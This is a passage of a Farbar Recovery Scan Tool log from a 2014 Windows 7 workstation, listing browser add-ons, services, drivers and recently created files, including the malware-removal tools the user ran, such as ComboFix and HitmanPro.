ShellIconOverlayIdentifiers: UninitializedFdeIconOverlay -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=msnHomeST&OCID=msnHomepage
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKCU - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T29L10NSP2-23/support/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 10.0.0.2

FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\mike\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Endpoint Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-08-14]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-02-11]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird

Chrome:
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 CmRegService; C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe [12288 2014-01-14] (Toshiba America Information Systems, Inc.) [File not signed]
S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [40888 2013-02-14] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1020304 2013-02-14] (ESET)
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [218504 2012-01-17] ()
S3 ESHASRV; C:\Program Files\ESET\ESET NOD32 Antivirus\EShaSrv.exe [190208 2013-02-14] (ESET)
S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AC_Service.exe [309568 2014-07-10] (Citrix Online, a division of Citrix Systems, Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166432 2012-10-22] (Intel Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2012-02-08] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2012-02-08] (Hewlett-Packard) [File not signed]
R2 SentinelProtectionServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe [206400 2006-12-21] (SafeNet, Inc)
S2 tcsd_win32.exe; C:\Program Files (x86)\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1637888 2011-10-08] () [File not signed]
R2 Wave Authentication Manager Service; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [1679872 2012-01-05] (Wave Systems Corp.) [File not signed]
S3 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [198144 2012-01-16] (Wave Systems Corp.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [217000 2013-02-04] (ESET)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [183016 2013-04-09] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [153200 2013-02-04] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [141304 2013-02-04] (ESET)
R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTDVHD64.sys [3708776 2012-02-07] (Realtek Semiconductor Corp.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-28 15:18 - 2014-08-28 15:18 - 00038660 _____ () C:\Users\mike\Desktop\HitmanPro_20140828_1518.log
2014-08-28 15:11 - 2014-08-28 15:11 - 11193392 _____ (SurfRight B.V.) C:\Users\mike\Desktop\HitmanPro_x64.exe
2014-08-28 15:10 - 2014-08-28 15:18 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-28 15:08 - 2014-08-28 15:09 - 10279800 _____ (SurfRight B.V.) C:\Users\mike\Desktop\HitmanPro.exe
2014-08-28 14:57 - 2014-08-28 14:57 - 00023791 _____ () C:\ComboFix.txt
2014-08-28 14:35 - 2014-08-28 14:57 - 00000000 ____D () C:\Qoobox
2014-08-28 14:35 - 2014-08-28 14:56 - 00000000 ____D () C:\Windows\erdnt
2014-08-28 14:35 - 2011-06-25 23:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-28 14:35 - 2010-11-07 10:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-28 14:35 - 2009-04-19 21:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-28 14:33 - 2014-08-28 14:34 - 05574834 ____R (Swearware) C:\Users\mike\Desktop\ComboFix.exe
2014-08-28 14:19 - 2014-08-28 15:20 - 00014924 _____ () C:\Users\mike\Desktop\FRST.txt
2014-08-28 14:19 - 2014-08-28 14:20 - 00039005 _____ () C:\Users\mike\Desktop\Addition.txt
2014-08-28 14:18 - 2014-08-28 15:20 - 00000000 ____D () C:\FRST
2014-08-28 14:18 - 2014-08-28 14:18 - 02103296 _____ (Farbar) C:\Users\mike\Desktop\FRST64.exe
2014-08-28 14:16 - 2014-08-28 14:16 - 00415232 _____ (Farbar) C:\Users\mike\Desktop\FSS.exe
2014-08-28 13:58 - 2014-08-28 14:01 - 00015759 _____ () C:\Users\mike\Desktop\attach.txt
2014-08-28 13:58 - 2014-08-28 14:00 - 00018738 _____ () C:\Users\mike\Desktop\dds.txt
2014-08-28 13:46 - 2014-08-28 13:46 - 00688992 ____R (Swearware) C:\Users\mike\Desktop\dds.com
2014-08-28 10:31 - 2014-08-28 10:31 - 00000000 ____D () C:\Users\mike\Desktop\ProcessExplorer
2014-08-28 10:29 - 2014-08-28 10:29 - 01187960 _____ () C:\Users\mike\Desktop\ProcessExplorer.zip
2014-08-27 16:25 - 2014-08-27 16:25 - 00000000 ____D () C:\ProgramData\ATI
2014-08-27 16:23 - 2014-08-27 16:23 - 00000000 ____D () C:\Program Files\AMD
2014-08-27 15:05 - 2014-08-27 15:05 - 00000026 _____ () C:\Windows\cur
2014-08-27 15:04 - 2014-08-27 15:09 - 00000059 _____ () C:\Windows\LTDLGFILE14N.INI
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\library_dir
2014-08-27 14:54 - 2014-08-28 13:51 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Raptr
2014-08-27 14:54 - 2014-08-27 14:55 - 00000000 ____D () C:\Program Files (x86)\Raptr
2014-08-27 14:54 - 2014-08-27 14:54 - 00061828 _____ () C:\Windows\SysWOW64\CCCInstall_201408271454457815.log
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\AMD
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\Common Files\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-08-27 14:53 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-27 14:53 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-08-27 14:52 - 2014-08-27 14:52 - 00000000 ____D () C:\AMD
2014-08-27 14:51 - 2014-08-27 14:27 - 269338400 _____ (AMD Inc.) C:\Users\networkadmin\Desktop\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
2014-08-27 13:33 - 2014-08-27 13:33 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Adobe
2014-08-27 13:29 - 2014-08-27 13:29 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Dell
2014-08-27 13:21 - 2014-08-27 13:29 - 211706272 _____ (Dell Inc.) C:\Users\networkadmin\Downloads\Video_Driver_HCTV5_WN32_8.922_A00.EXE
2014-08-27 13:06 - 2014-08-27 13:07 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\My Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-08-27 13:03 - 2014-08-27 13:20 - 00000000 ____D () C:\temp
2014-08-27 13:03 - 2014-08-27 13:03 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\PCDr
2014-08-27 13:02 - 2014-08-27 13:02 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 11:50 - 2014-08-27 12:07 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-27 11:50 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-27 11:50 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-27 11:31 - 2014-08-27 11:31 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 11:27 - 2014-08-27 11:27 - 00377984 _____ () C:\Windows\Minidump\082714-28298-01.dmp
2014-08-27 11:07 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Toshiba
2014-08-27 11:06 - 2014-08-27 11:06 - 00447224 _____ () C:\Windows\Minidump\082714-26130-01.dmp
2014-08-21 09:37 - 2014-08-21 09:37 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Toshiba
2014-08-21 09:36 - 2014-08-21 09:37 - 00000000 ____D () C:\ProgramData\Toshiba
2014-08-21 09:36 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-08-21 09:36 - 2013-06-04 06:59 - 00041472 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\agphlink.tsp
2014-08-21 09:36 - 2013-06-04 06:58 - 00220672 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\intrtspi.tsp
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jabra
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Toshiba
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Plantronics
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Jabra
2014-08-21 09:35 - 2013-10-16 09:08 - 00131155 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\gtapiocx.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00081920 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\DumpWin.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00069632 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\playrec.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00061440 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\CTSMail.dll
2014-08-21 09:35 - 2013-10-16 09:08 - 00040960 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\DDEWrap.ocx
2014-08-21 09:35 - 2013-06-04 07:16 - 00127037 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\eClient.ocx
2014-08-21 09:35 - 2013-06-04 07:16 - 00053306 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\sock.ocx
2014-08-21 09:35 - 2011-11-16 07:59 - 00000408 _____ () C:\Windows\SysWOW64\eClient.lic
2014-08-21 09:35 - 2009-11-05 08:20 - 00626688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr80.dll
2014-08-21 09:35 - 2009-11-05 08:20 - 00000414 _____ () C:\Windows\SysWOW64\gtapiocx.lic
2014-08-21 09:35 - 2006-03-13 14:28 - 00368912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbar332.dll
2014-08-21 09:34 - 2014-08-21 09:34 - 00087328 _____ () C:\Users\teleco3\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Macromedia
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Intel Corporation
2014-08-21 09:33 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Adobe
2014-08-21 09:33 - 2014-08-21 09:33 - 00001411 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Adobe
2014-08-21 09:32 - 2014-08-21 09:33 - 00001445 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-08-21 09:32 - 2014-08-21 09:32 - 00000020 ___SH () C:\Users\teleco3\ntuser.ini
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Windows Small Business Server
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3
2014-08-21 09:32 - 2014-02-07 03:01 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Microsoft Help
2014-08-21 09:32 - 2009-07-13 21:54 - 00000000 ___RD () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-08-21 09:32 - 2009-07-13 21:49 - 00000000 ___RD () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-08-20 12:14 - 2014-08-20 12:14 - 00007605 _____ () C:\Users\mike\AppData\Local\Resmon.ResmonCfg
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\Program Files\ESET
2014-08-06 03:04 - 2014-03-24 19:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-06 03:04 - 2014-03-24 19:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-08-06 03:03 - 2014-06-17 19:18 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe
2014-08-06 03:03 - 2014-06-17 18:51 - 00646144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\osk.exe
2014-08-06 03:03 - 2014-06-17 18:10 - 03157504 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-06 03:02 - 2014-06-06 03:10 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-08-06 03:02 - 2014-06-06 02:44 - 00509440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-08-06 03:02 - 2014-05-29 23:45 - 00497152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-08-06 03:01 - 2014-06-06 19:42 - 02148352 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-06 03:01 - 2014-06-06 19:42 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-06 03:01 - 2014-06-06 19:42 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-08-06 03:01 - 2014-06-06 19:40 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-06 03:01 - 2014-06-06 15:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-08-06 03:01 - 2014-06-06 15:53 - 01796096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-08-06 03:01 - 2014-06-06 15:53 - 00073728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-08-06 03:01 - 2014-06-06 15:52 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-08-06 03:01 - 2014-03-04 02:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-08-06 03:01 - 2014-03-04 02:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2014-08-06 03:01 - 2014-03-04 02:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-08-06 03:01 - 2014-03-04 02:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-08-06 03:01 - 2014-03-04 02:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-08-06 03:01 - 2014-03-04 02:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-08-06 03:01 - 2014-03-04 02:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-08-06 03:01 - 2014-03-04 02:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-08-06 03:01 - 2014-03-04 02:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-08-06 03:01 - 2013-08-01 19:12 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2014-08-06 03:01 - 2013-08-01 19:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2014-08-06 03:01 - 2013-08-01 18:48 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2014-08-06 03:01 - 2013-08-01 17:59 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2014-08-06 03:00 - 2014-06-06 21:02 - 17854464 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-06 03:00 - 2014-06-06 20:13 - 10890752 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-06 03:00 - 2014-06-06 19:59 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-06 03:00 - 2014-06-06 19:52 - 01348608 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-06 03:00 - 2014-06-06 19:51 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-06 03:00 - 2014-06-06 19:51 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-06 03:00 - 2014-06-06 19:50 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-08-06 03:00 - 2014-06-06 19:47 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-06 03:00 - 2014-06-06 19:42 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-06 03:00 - 2014-06-06 19:39 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-08-06 03:00 - 2014-06-06 19:35 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-06 03:00 - 2014-06-06 17:05 - 12353024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
